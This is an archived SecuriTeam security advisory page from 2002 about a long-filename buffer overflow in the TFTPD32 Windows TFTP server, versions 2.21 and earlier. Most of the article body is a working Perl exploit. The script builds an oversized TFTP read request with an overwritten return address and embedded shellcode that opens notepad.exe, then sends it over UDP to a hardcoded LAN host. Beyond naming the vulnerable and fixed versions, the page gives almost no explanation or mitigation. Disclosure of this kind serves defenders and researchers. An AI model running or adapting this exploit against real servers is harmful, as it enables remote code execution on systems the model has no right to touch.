Tftpd TFTP server v2.21 and below remote command execution exploit in perl. Fix available here.
fcdc959822bf5fe12b26d0525067a4065e0b63beccdcd45371546b50e251eacf
<!-- Version = 3.3 -->
<html>
<head>
<title>SecuriTeam.com ™ (TFTPD32 Buffer Overflow Vulnerability (Long filename))</title>
<meta name="Description" content="Beyond Security will help you expose your security holes and will show you what the bad guys already know about your hosts and network. Use our Automated Scanning service to perform a full security audit of your site, and find the latest security news and tools on Beyond Security's SecuriTeam web site.">
<meta name="Keywords" content="Beyond Security, automated scanning, security news, security, hack, hacker, hacking, crack, cracker, cracking, exploits, securiteam, root, intrusion detection, windows, windowsnt, nt, server, unix, linux, solaris, sunos, aix, audit, firewall, scanner, internet, intranet, vulnerability, phreak, redhat, suse, debian, rootshell, maximum, tcpip, udp, tcp, cryptography, hunt, session, hijack, reset, ack, syn, rst">
<meta http-equiv="expires" content="01 Jan 1998 01:01:00 GMT">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<meta http-equiv="Content-Language" content="en-us">
<meta name="HandheldFriendly" content="True">
</head>
<STYLE TYPE=TEXT/CSS>
A:HOVER {COLOR: RED}
.links
{
COLOR: BLACK;
TEXT-DECORATION: underline
}
</STYLE>
<body BGCOLOR="white">
<DIV align="center">
<TABLE cellpadding="0" cellspacing="1" border="0">
<TR>
<TD COLSPAN="3" width="1" height="1" bgcolor="black"><img src="http://www.securiteam.com/space.gif" height=1 border="0" width=1 alt=&"nbsp;"></TD>
</TR>
<tr>
<td COLSPAN="3" style="PADDING-LEFT: 4pt">
<font size="2" face="Verdana, Arial, Helvetica, sans-serif" color="#0000ff">
<a href="http://www.beyondsecurity.com/" style="COLOR: #000000; TEXT-DECORATION: none">Beyond-Security's</a> <a href="http://www.securiteam.com/" style="COLOR: #000000; TEXT-DECORATION: none">SecuriTeam.com</a><br>
</font>
</td>
</tr>
<TR>
<TD COLSPAN="3" width="1" height="1" bgcolor="black"><img src="http://www.securiteam.com/space.gif" height=1 border="0" width=1 alt=&"nbsp;"></TD>
</TR>
<TR>
<TD valign="top" width="190">
<BR>
<font size="1" face="Verdana, Arial, Helvetica, sans-serif" color="#0000ff">
<a href="http://www.securiteam.com/" class="links">SecuriTeam Home</a><br>
<a href="http://www.securiteam.com/aboutus.html" class="links">About SecuriTeam</a><br>
<a href="http://www.securiteam.com/askus.html" class="links">Ask the Team</a><br>
<a href="http://www.securiteam.com/ads.html" class="links">Advertising info</a><br>
<a href="http://www.securiteam.com/securitynews/" class="links">Security News</a><br>
<a href="http://www.securiteam.com/securityreviews/" class="links">Security Reviews</a><br>
<a href="http://www.securiteam.com/exploits/" class="links">Exploits</a><br>
<a href="http://www.securiteam.com/tools/" class="links">Tools</a><br>
<a href="http://www.securiteam.com/unixfocus/" class="links">UNIX focus</a><br>
<a href="http://www.securiteam.com/windowsntfocus/" class="links">Windows NT focus</a><br>
</font>
<form method="post" action="http://www.securiteam.com/cgi-bin/htsearch" id=form1 name=form1>
<input name="words" value="Search" maxlength="100" size="10" >
<input type="hidden" name="method" value="and">
<input type="hidden" name="format" value="builtin-long">
<input type="hidden" name="sort" value="score">
<input type="hidden" name="config" value="htdigSecuriTeam">
<input type="hidden" name="restrict" >
<input type="hidden" name="exclude" >
<INPUT TYPE="image" SRC="http://www.securiteam.com/search.gif" BORDER=0 id=image1 name=image1>
</form>
<br>
<!--htdig-noindex-->
<div style="FONT-SIZE: 9pt">1. <a href="6R00B2A60E.html">LiteServe URL Decoding DoS</a><br>
2. <a href="6D00D2061G.html">TFTPD32 Directory Traversal Vulnerability</a><br>
3. <a href="6C00C2061A.html">TFTPD32 Buffer Overflow Vulnerability (Long filename)</a><br>
4. <a href="6G00H2060G.html">IISPop Remote DoS</a><br>
5. <a href="6A00B2060Y.html">Perception LiteServe HTTP CGI Disclosure Vulnerability</a><br>
</div><br>
<!--/htdig-noindex-->
<img src="http://www.securiteam.com/email.gif" alt="" border="0" align="left"><A href="email/6C00C2061A.html" style ="FONT-SIZE: 10pt" >E-Mail this article to a friend</A><br><A href="mailto:comments@securiteam.com?subject=TFTPD32 Buffer Overflow Vulnerability (Long filename)" style ="FONT-SIZE: 10pt" >Send us comments</A>
</TD>
<TD rowspan="2" width="1" height="1" bgcolor="black"><img src="http://www.securiteam.com/space.gif" height=1 border="0" width=1 alt=&"nbsp;"></TD>
<td>
<TABLE border="0" style="MARGIN-LEFT: 4pt">
<tr>
<TD colspan="2" align="middle">
<br>
<!-- Ad -->
<center>
<div align="center">
<IFRAME src="http://adserver.matchcraft.com/adserver/layer/SecuriTeam/Security!20News!2c!20Tools!20and!20Reviews/468x60" marginwidth="0" marginheight="0" width="468" height="60" frameborder="0" scrolling="no">
<SCRIPT language=javascript>document.write('<SCRIPT language=javascript src="http://adserver.matchcraft.com/adserver/jslayer/SecuriTeam/Security!20News!2c!20Tools!20and!20Reviews/468x60"></SCRIPT>');
</SCRIPT>
<NOSCRIPT><a href="http://www.matchcraft.com"><img src="http://adserver.matchcraft.com/adserver/redirect/MC468x60.gif/SecuriTeam" width="468" height="60"></a>
</NOSCRIPT>
</IFRAME>
</div>
</center>
<br>
</TD>
</tr>
<TR>
<TD align="left" bgColor="navy"> <FONT color="white"><B style="FONT-SIZE: 12pt">Title</B></FONT></TD>
<TD bgColor="navy" align="right" width="10%"><FONT color="white"><B style="FONT-SIZE: 11pt">17/11/2002</B></FONT></TD>
</TR>
<TR>
<TD colspan="2" align="middle" ><B style="FONT-SIZE: 15pt">TFTPD32 Buffer Overflow Vulnerability (Long filename)<br>
<br></B></TD>
</TR>
<TR>
<TD colspan="2" align="left" bgColor="navy"> <FONT color=white><B style="FONT-SIZE: 12pt">Summary</B></FONT></TD>
</TR>
<TR>
<TD colspan="2" style="FONT-SIZE: 11pt"><A HREF="http://tftpd32.jounin.net">TFTPD32</A> is a Freeware TFTP server for Windows 9x/NT/XP. It provides an implementation of the TFTPv2 protocol (specified in the RFC 1350). <br>
A vulnerability in the product allows remote attackers to cause the product to execute arbitrary code.<br>
<br></TD>
</TR>
<TR>
<TD colspan="2" align="left" bgColor="navy"> <FONT color="white"><B style="FONT-SIZE: 12pt">Details</B></FONT></TD>
</TR>
<TR>
<TD colspan="2" style="FONT-SIZE: 11pt"><B>Vulnerable systems:</B><br>
* TFTP32 version 2.21 and prior<br>
<br>
<B>Immune systems:</B><br>
* TFTP32 version 2.50.2<br>
<br>
<B>Exploit:</B><br>
#!/usr/bin/perl<br>
#TFTP Server remote Buffer Overflow<br>
use IO::Socket;<br>
$host = "192.168.1.53";<br>
$port = "69";<br>
$data = "A";<br>
<br>
#$buf .= "\x00\x02"; # Send ---- Choose one<br>
$buf .= "\x00\x01"; # Recieve<br>
<br>
$buf .= "A";<br>
$num = "116";<br>
$buf .= $data x $num;<br>
$buf .= ".";<br>
$num = "140"; # EIP section<br>
$buf .= $data x $num;<br>
<br>
$address = "\xFF\xFF\xFF\xFF";<br>
$buf .= $address;<br>
<br>
$egg = "\xEB\x27\x8B\x34\x24\x33\xC9\x33\xD2\xB2";<br>
$egg .= "\x0B\x03\xF2\x88\x0E\x2B\xF2\xB8\xAF\xA7";<br>
$egg .= "\xE6\x77\xB1\x05\xB2\x04\x2B\xE2\x89\x0C";<br>
$egg .= "\x24\x2B\xE2\x89\x34\x24\xFF\xD0\x90\xEB";<br>
$egg .= "\xFD\xE8\xD4\xFF\xFF\xFF";<br>
$egg .= "notepad.exe";<br>
<br>
$egg .= "\x90\x90\x90\x90\x90\x90";<br>
$buf .= $egg;<br>
<br>
$buf .= "\x00binary\x00";<br>
<br>
$socket = IO::Socket::INET->new(Proto => "udp") or die "Socket error: $@\n";<br>
$ipaddr = inet_aton($host) || $host;<br>
$portaddr = sockaddr_in($port, $ipaddr);<br>
send($socket, $buf, 0, $portaddr) == length($buf) or die "Can't send: $!\n";<br>
print "Now, '$host' should open up a notepad\n";<br>
<br></TD>
</TR>
<TR>
<TD colspan="2" align=left bgColor=navy> <FONT color=white><B style="FONT-SIZE: 12pt">Additional information</B></FONT></TD>
</TR>
<TR>
<TD colspan="2" style="FONT-SIZE: 11pt">The information has been provided by <A HREF="mailto:expert at securiteam.com">SecurITeam Experts</A>.
<br></TD>
</TR>
</TABLE>
</td>
</TR>
<TR>
<TD COLSPAN="3"> </TD>
</TR>
<TR>
<TD COLSPAN="3" width="1" height="1" bgcolor="orange"><img src="http://www.securiteam.com/space.gif" height=1 border="0" width=1 alt=&"nbsp;"></TD>
</TR>
<tr>
<td COLSPAN="3">
<div align="center">
<font color="gray" style="FONT-SIZE: 8pt">
Copyright © 1998-2001 <a href="http://www.beyondsecurity.com/info.html" style="COLOR: gray; FONT-SIZE: 7pt">Beyond Security
Ltd.</a> All rights reserved.<br>
<a href="http://www.beyondsecurity.com/legal.html" style="COLOR: gray; FONT-SIZE: 7pt">Terms of Use</a> <a href="http://www.beyondsecurity.com/privacy.html" style="COLOR: gray; FONT-SIZE: 7pt">Site Privacy Statement</a>.<br><br>
</font>
</div>
</td>
</tr>
</TABLE>
</DIV>
</body>
</html>